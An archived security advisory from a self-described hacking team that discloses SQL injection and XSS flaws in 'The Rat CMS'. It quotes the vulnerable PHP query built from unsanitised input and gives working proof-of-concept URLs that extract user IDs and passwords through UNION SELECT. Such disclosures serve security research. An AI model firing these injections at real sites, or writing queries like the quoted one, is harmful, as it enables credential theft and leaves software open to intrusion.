Visit our newest sister site!
Hundreds of free aircraft flight manuals
Civilian • Historical • Military • Declassified • FREE!


TUCoPS :: Web :: CMS / Portals :: bx3593.htm

The Rat CMS (SQL/XSS) Multiple Remote Vulnerabilities



The Rat CMS (SQL/XSS) Multiple Remote Vulnerabilities
The Rat CMS (SQL/XSS) Multiple Remote Vulnerabilities



===========================================================0D
  The Rat CMS (SQL/XSS) Multiple Remote Vulnerabilities=0D
===========================================================0D
=0D
  ,--^----------,--------,-----,-------^--,=0D
  | |||||||||   `--------'     |          O	.. CWH Underground Hacking Team ..=0D
  `+---------------------------^----------|=0D
    `\_,-------, _________________________|=0D
      / XXXXXX /`|     /=0D
     / XXXXXX /  `\   /=0D
    / XXXXXX /\______(=0D
   / XXXXXX /           =0D
  / XXXXXX /=0D
 (________(             =0D
  `------'=0D
=0D
=0D
AUTHOR : CWH Underground=0D
DATE   : 25 June 2008=0D
SITE   : cwh.citec.us=0D
=0D
=0D
#####################################################=0D
 APPLICATION : The Rat CMS=0D
 VERSION     : Pre-Alpha 2=0D
 VENDOR      : N/A=0D
DOWNLOAD : http://downloads.sourceforge.net/the-rat-cms=0D 
#####################################################=0D
=0D
--- Remote SQL Injection ---=0D
=0D
---------------------------------------=0D
 Vulnerable File [viewarticle.php?id=]=0D
---------------------------------------=0D
=0D
@Line 5=0D
=0D
   73:  $query = "SELECT title, content FROM news WHERE id=".$_GET['id'];=0D
   74:  $result = mysql_query($query) or die('Error : ' . mysql_error()); =0D
   75:  $row = mysql_fetch_array($result, MYSQL_ASSOC); =0D
=0D
=0D
---------=0D
 Exploit=0D
---------=0D
=0D
[+] http://[Target]/[trcms_path]/viewarticle.php?id=[SQL Injection]=0D 
[+] http://[Target]/[trcms_path]/viewarticle2.php?id=[SQL Injection]=0D 
=0D
=0D
-------------=0D
 POC Exploit=0D
-------------=0D
=0D
http://192.168.24.25/trcms/viewarticle.php?id=-9999/**/UNION/**/SELECT/**/user_id,user_password/**/FROM/**/tbl_auth_user--=0D 
http://192.168.24.25/trcms/viewarticle2.php?id=-9999/**/UNION/**/SELECT/**/user_id,user_password/**/FROM/**/tbl_auth_user--=0D 
=0D
=0D
--- Remote XSS ---=0D
=0D
---------=0D
 Exploit=0D
---------=0D
=0D
[+] http://[Target]/[trcms_path]/viewarticle.php/=0D 
[+] http://[Target]/[trcms_path]/viewarticle.php?id==0D 
[+] http://[Target]/[trcms_path]/viewarticle2.php?id==0D 
=0D
##################################################################=0D
# Greetz: ZeQ3uL, BAD $ectors, Snapter, Conan, JabAv0C, Win7dos  #=0D
##################################################################


TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH